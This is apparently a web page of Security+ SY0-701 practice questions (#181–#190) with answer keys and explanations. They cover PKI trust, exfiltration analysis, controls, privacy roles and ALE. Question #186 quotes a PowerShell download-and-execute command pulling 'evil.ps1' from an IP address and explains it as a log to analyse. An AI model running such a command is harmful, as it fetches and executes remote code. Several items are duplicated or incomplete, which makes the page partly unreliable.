Practice Free SY0-701 Exam Online Questions
Question #181
An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key.
Which of the following should the administrator check for next?
- A . If the wildcard certificate is configured
- B . If the certificate signing request is valid
- C . If the root certificate is installed
- D . If the public key is configured
Correct Answer: C
C
Explanation:
The correct answer is If the root certificate is installed because trust errors in SSL/TLS deployments most commonly occur when the certificate chain cannot be validated back to a trusted root certificate authority. In the Security+ SY0-701 cryptography and PKI objectives, trust is established through a chain of trust, beginning with a trusted root CA, followed by any intermediate CAs, and ending with the server’s certificate.
In this scenario, the administrator has already confirmed that the certificate was issued by a legitimate CA and that the private key is valid. This eliminates common issues related to key mismatch or improper issuance. The next logical step is to verify that the system (or the client systems connecting to it) trusts the CA that issued the certificate. If the root certificate―or required intermediate certificates―are missing from the trust store, clients will flag the certificate as untrusted even though it is otherwise valid.
Option A, checking wildcard configuration, is not relevant unless the certificate is being used for multiple subdomains, which is not indicated.
Option B, validating the certificate signing request, would be unnecessary because the CA successfully issued the certificate.
Option D, verifying the public key, is incorrect because the public key is embedded in the certificate and would already be validated as part of successful issuance.
The SY0-701 study guide highlights that certificate trust failures are frequently caused by incomplete certificate chains, missing root or intermediate certificates, or misconfigured trust stores. Ensuring that the correct root CA certificate is installed allows systems to verify the certificate’s authenticity and establish secure communications.
In summary, when an SSL certificate is valid but not trusted, the most likely cause is a missing trusted root certificate, making option C the correct answer.
C
Explanation:
The correct answer is If the root certificate is installed because trust errors in SSL/TLS deployments most commonly occur when the certificate chain cannot be validated back to a trusted root certificate authority. In the Security+ SY0-701 cryptography and PKI objectives, trust is established through a chain of trust, beginning with a trusted root CA, followed by any intermediate CAs, and ending with the server’s certificate.
In this scenario, the administrator has already confirmed that the certificate was issued by a legitimate CA and that the private key is valid. This eliminates common issues related to key mismatch or improper issuance. The next logical step is to verify that the system (or the client systems connecting to it) trusts the CA that issued the certificate. If the root certificate―or required intermediate certificates―are missing from the trust store, clients will flag the certificate as untrusted even though it is otherwise valid.
Option A, checking wildcard configuration, is not relevant unless the certificate is being used for multiple subdomains, which is not indicated.
Option B, validating the certificate signing request, would be unnecessary because the CA successfully issued the certificate.
Option D, verifying the public key, is incorrect because the public key is embedded in the certificate and would already be validated as part of successful issuance.
The SY0-701 study guide highlights that certificate trust failures are frequently caused by incomplete certificate chains, missing root or intermediate certificates, or misconfigured trust stores. Ensuring that the correct root CA certificate is installed allows systems to verify the certificate’s authenticity and establish secure communications.
In summary, when an SSL certificate is valid but not trusted, the most likely cause is a missing trusted root certificate, making option C the correct answer.
Question #182
A security analyst receives an alert from a corporate endpoint used by employees to issue visitor badges. The alert contains the following details:
Which of the following best describes the indicator that triggered the alert?
- A . Blocked content
- B . Brute-force attack
- C . Concurrent session usage
- D . Account lockout
Correct Answer: B
B
Explanation:
Detailed The activity described in the table, where multiple connection attempts are made on port 445 (used for SMB services), suggests a brute-force attack. The attacker likely used automated methods to guess credentials, causing multiple failures. Such attempts are a hallmark of brute-force attacks targeting shared resources.
Reference: CompTIA Security+ SY0-701 Study Guide, Domain 4: Security Operations, Section: "Indicators of Malicious Activity".
B
Explanation:
Detailed The activity described in the table, where multiple connection attempts are made on port 445 (used for SMB services), suggests a brute-force attack. The attacker likely used automated methods to guess credentials, causing multiple failures. Such attempts are a hallmark of brute-force attacks targeting shared resources.
Reference: CompTIA Security+ SY0-701 Study Guide, Domain 4: Security Operations, Section: "Indicators of Malicious Activity".
Question #183
A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network.
Which of the following actions is the most efficient way to identify where the system data was exfiltrated from and where it was sent?
- A . Analyze firewall and network logs for large amounts of outbound traffic to external IP addresses or domains.
- B . Analyze IPS and IDS logs to find the IP addresses used by the attacker for reconnaissance scans.
- C . Analyze endpoint and application logs to see whether file-sharing programs were running.
- D . Analyze external vulnerability scans to identify exploitable systems.
Correct Answer: A
A
Explanation:
To efficiently identify where data was exfiltrated from and where it was sent, the best action is to analyze firewall and network logs for unusually large outbound data transfers. Security+ SY0-701 emphasizes that network-level telemetry provides the most direct evidence of data exfiltration, including source IPs, destination IPs or domains, ports, protocols, timestamps, and data volume.
Firewall and flow logs can quickly reveal which internal systems transmitted large quantities of data externally and identify the attacker’s destination infrastructure. This approach is efficient because it focuses directly on the movement of data rather than preliminary or secondary indicators.
IPS/IDS logs (B) are more useful for detecting reconnaissance or intrusion attempts, not confirming data theft paths. Endpoint and application logs (C) may help identify tools used but are less efficient for mapping data movement. External vulnerability scans (D) identify weaknesses, not exfiltration
activity.
Therefore, the most efficient action is A: Analyze firewall and network logs for large outbound traffic.
A
Explanation:
To efficiently identify where data was exfiltrated from and where it was sent, the best action is to analyze firewall and network logs for unusually large outbound data transfers. Security+ SY0-701 emphasizes that network-level telemetry provides the most direct evidence of data exfiltration, including source IPs, destination IPs or domains, ports, protocols, timestamps, and data volume.
Firewall and flow logs can quickly reveal which internal systems transmitted large quantities of data externally and identify the attacker’s destination infrastructure. This approach is efficient because it focuses directly on the movement of data rather than preliminary or secondary indicators.
IPS/IDS logs (B) are more useful for detecting reconnaissance or intrusion attempts, not confirming data theft paths. Endpoint and application logs (C) may help identify tools used but are less efficient for mapping data movement. External vulnerability scans (D) identify weaknesses, not exfiltration
activity.
Therefore, the most efficient action is A: Analyze firewall and network logs for large outbound traffic.
Question #183
A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network.
Which of the following actions is the most efficient way to identify where the system data was exfiltrated from and where it was sent?
- A . Analyze firewall and network logs for large amounts of outbound traffic to external IP addresses or domains.
- B . Analyze IPS and IDS logs to find the IP addresses used by the attacker for reconnaissance scans.
- C . Analyze endpoint and application logs to see whether file-sharing programs were running.
- D . Analyze external vulnerability scans to identify exploitable systems.
Correct Answer: A
A
Explanation:
To efficiently identify where data was exfiltrated from and where it was sent, the best action is to analyze firewall and network logs for unusually large outbound data transfers. Security+ SY0-701 emphasizes that network-level telemetry provides the most direct evidence of data exfiltration, including source IPs, destination IPs or domains, ports, protocols, timestamps, and data volume.
Firewall and flow logs can quickly reveal which internal systems transmitted large quantities of data externally and identify the attacker’s destination infrastructure. This approach is efficient because it focuses directly on the movement of data rather than preliminary or secondary indicators.
IPS/IDS logs (B) are more useful for detecting reconnaissance or intrusion attempts, not confirming data theft paths. Endpoint and application logs (C) may help identify tools used but are less efficient for mapping data movement. External vulnerability scans (D) identify weaknesses, not exfiltration
activity.
Therefore, the most efficient action is A: Analyze firewall and network logs for large outbound traffic.
A
Explanation:
To efficiently identify where data was exfiltrated from and where it was sent, the best action is to analyze firewall and network logs for unusually large outbound data transfers. Security+ SY0-701 emphasizes that network-level telemetry provides the most direct evidence of data exfiltration, including source IPs, destination IPs or domains, ports, protocols, timestamps, and data volume.
Firewall and flow logs can quickly reveal which internal systems transmitted large quantities of data externally and identify the attacker’s destination infrastructure. This approach is efficient because it focuses directly on the movement of data rather than preliminary or secondary indicators.
IPS/IDS logs (B) are more useful for detecting reconnaissance or intrusion attempts, not confirming data theft paths. Endpoint and application logs (C) may help identify tools used but are less efficient for mapping data movement. External vulnerability scans (D) identify weaknesses, not exfiltration
activity.
Therefore, the most efficient action is A: Analyze firewall and network logs for large outbound traffic.
Question #185
An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk.
Which type of control is being implemented?
- A . Compensating
- B . Detective
- C . Operational
- D . Physical
Correct Answer: A
A
Explanation:
A bastion host is a hardened system placed at a network boundary to absorb attacks and limit exposure. When deployed to mitigate risks from zero-day vulnerabilities, it acts as a compensating control. CompTIA Security+ SY0-701 defines compensating controls as alternative safeguards used when primary controls are insufficient or unavailable―such as when no patch exists for a zero-day.
Detective controls (B) identify issues but do not reduce exposure. Operational controls (C) refer to procedural or human-driven processes. Physical controls (D) secure physical environments (e.g., locks, cameras).
Because a bastion host compensates for the lack of a patch, the correct answer is A: Compensating.
A
Explanation:
A bastion host is a hardened system placed at a network boundary to absorb attacks and limit exposure. When deployed to mitigate risks from zero-day vulnerabilities, it acts as a compensating control. CompTIA Security+ SY0-701 defines compensating controls as alternative safeguards used when primary controls are insufficient or unavailable―such as when no patch exists for a zero-day.
Detective controls (B) identify issues but do not reduce exposure. Operational controls (C) refer to procedural or human-driven processes. Physical controls (D) secure physical environments (e.g., locks, cameras).
Because a bastion host compensates for the lack of a patch, the correct answer is A: Compensating.
Question #186
A security analyst reviews the following endpoint log:
powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1")
Which of the following logs will help confirm an established connection to IP address 176.30.40.50?
- A . System event logs
- B . EDR logs
- C . Firewall logs
- D . Application logs
Correct Answer: C
C
Explanation:
The best answer is C. Firewall logs.
The PowerShell command shown is suspicious because it uses:
-exec bypass to bypass PowerShell execution policy
IEX (Invoke-Expression) to execute downloaded content in memory
Net.WebClient.DownloadString() to retrieve a remote script from the IP address 176.30.40.50
The question asks which logs will help confirm an established connection to that IP address. The best source for confirming that network communication actually occurred is firewall logs, because they record allowed and blocked inbound or outbound network connections between systems and remote IP addresses.
Why the other options are incorrect:
C
Explanation:
The best answer is C. Firewall logs.
The PowerShell command shown is suspicious because it uses:
-exec bypass to bypass PowerShell execution policy
IEX (Invoke-Expression) to execute downloaded content in memory
Net.WebClient.DownloadString() to retrieve a remote script from the IP address 176.30.40.50
The question asks which logs will help confirm an established connection to that IP address. The best source for confirming that network communication actually occurred is firewall logs, because they record allowed and blocked inbound or outbound network connections between systems and remote IP addresses.
Why the other options are incorrect:
Question #187
Which of the following considerations is the most important for an organization to evaluate as it establishes and maintains a data privacy program?
- A . Reporting structure for the data privacy officer
- B . Request process for data subject access
- C . Role as controller or processor
- D . Physical location of the company
Correct Answer: C
C
Explanation:
The most important consideration when establishing a data privacy program is defining the organization’s role as a controller or processor. These roles, as outlined in privacy regulations such as the General Data Protection Regulation (GDPR), determine the responsibilities regarding the handling of personal data. A controller is responsible for determining the purpose and means of data processing, while a processor acts on behalf of the controller. This distinction is crucial for compliance with data privacy laws.
Reporting structure for the data privacy officer is important, but it is a secondary consideration compared to legal roles.
Request process for data subject access is essential for compliance but still depends on the organization’s role as controller or processor.
Physical location of the company can affect jurisdiction, but the role as controller or processor has a broader and more immediate impact.
C
Explanation:
The most important consideration when establishing a data privacy program is defining the organization’s role as a controller or processor. These roles, as outlined in privacy regulations such as the General Data Protection Regulation (GDPR), determine the responsibilities regarding the handling of personal data. A controller is responsible for determining the purpose and means of data processing, while a processor acts on behalf of the controller. This distinction is crucial for compliance with data privacy laws.
Reporting structure for the data privacy officer is important, but it is a secondary consideration compared to legal roles.
Request process for data subject access is essential for compliance but still depends on the organization’s role as controller or processor.
Physical location of the company can affect jurisdiction, but the role as controller or processor has a broader and more immediate impact.
Question #188
Which of the following architectures is most suitable to provide redundancy for critical business processes?
- A . Network-enabled
- B . Server-side
- C . Cloud-native
- D . Multitenant
Correct Answer: C
Question #189
An organization is evaluating the cost of licensing a new solution to prevent ransomware.
Which of the following is the most helpful in making this decision?
- A . ALE
- B . SLE
- C . RTO
- D . ARO
Correct Answer: A
A
Explanation:
ALE (Annualized Loss Expectancy) is the risk management metric most helpful when deciding whether the licensing cost of a ransomware prevention solution is justified.
ALE calculates the expected yearly financial loss from a particular threat. It is computed as:
ALE = SLE × ARO
SLE (Single Loss Expectancy) estimates the monetary impact of one ransomware incident.
ARO (Annualized Rate of Occurrence) estimates how often the incident is expected to happen each year.
By comparing ALE to the annual licensing cost of the new security solution, the organization can make a financially informed decision based on cost-benefit analysis. If ALE exceeds the solution’s cost, the purchase is justified.
RTO (C) relates to recovery time after outages, not cost justification. SLE (B) is only part of the calculation and insufficient alone. ARO (D) shows frequency but not financial impact.
Security+ SY0-701 highlights ALE as the primary metric for evaluating security investments.
Thus, ALE is the key factor in determining whether purchasing ransomware protection is financially beneficial.
A
Explanation:
ALE (Annualized Loss Expectancy) is the risk management metric most helpful when deciding whether the licensing cost of a ransomware prevention solution is justified.
ALE calculates the expected yearly financial loss from a particular threat. It is computed as:
ALE = SLE × ARO
SLE (Single Loss Expectancy) estimates the monetary impact of one ransomware incident.
ARO (Annualized Rate of Occurrence) estimates how often the incident is expected to happen each year.
By comparing ALE to the annual licensing cost of the new security solution, the organization can make a financially informed decision based on cost-benefit analysis. If ALE exceeds the solution’s cost, the purchase is justified.
RTO (C) relates to recovery time after outages, not cost justification. SLE (B) is only part of the calculation and insufficient alone. ARO (D) shows frequency but not financial impact.
Security+ SY0-701 highlights ALE as the primary metric for evaluating security investments.
Thus, ALE is the key factor in determining whether purchasing ransomware protection is financially beneficial.
Question #190
An organization recently started hosting a new service that customers access through a web portal. A security engineer needs to add to the existing security devices a new solution to protect this new service.
Which of the following is the engineer most likely to deploy?
- A . Layer 4 firewall
- B . NGFW
- C . WAF
- D . UTM
Correct Answer: C
C
Explanation:
The security engineer is likely to deploy a Web Application Firewall (WAF) to protect the new web portal service. A WAF specifically protects web applications by filtering, monitoring, and blocking HTTP requests based on a set of rules. This is crucial for preventing common attacks such as SQL injection, cross-site scripting (XSS), and other web-based attacks that could compromise the web service.
Layer 4 firewall operates primarily at the transport layer, focusing on IP address and port filtering, making it unsuitable for web application-specific threats.
NGFW (Next-Generation Firewall) provides more advanced filtering than traditional firewalls, including layer 7 inspection, but the WAF is tailored specifically for web traffic.
UTM (Unified Threat Management) offers a suite of security tools in one package (like antivirus, firewall, and content filtering), but for web application-specific protection, a WAF is the best fit.
C
Explanation:
The security engineer is likely to deploy a Web Application Firewall (WAF) to protect the new web portal service. A WAF specifically protects web applications by filtering, monitoring, and blocking HTTP requests based on a set of rules. This is crucial for preventing common attacks such as SQL injection, cross-site scripting (XSS), and other web-based attacks that could compromise the web service.
Layer 4 firewall operates primarily at the transport layer, focusing on IP address and port filtering, making it unsuitable for web application-specific threats.
NGFW (Next-Generation Firewall) provides more advanced filtering than traditional firewalls, including layer 7 inspection, but the WAF is tailored specifically for web traffic.
UTM (Unified Threat Management) offers a suite of security tools in one package (like antivirus, firewall, and content filtering), but for web application-specific protection, a WAF is the best fit.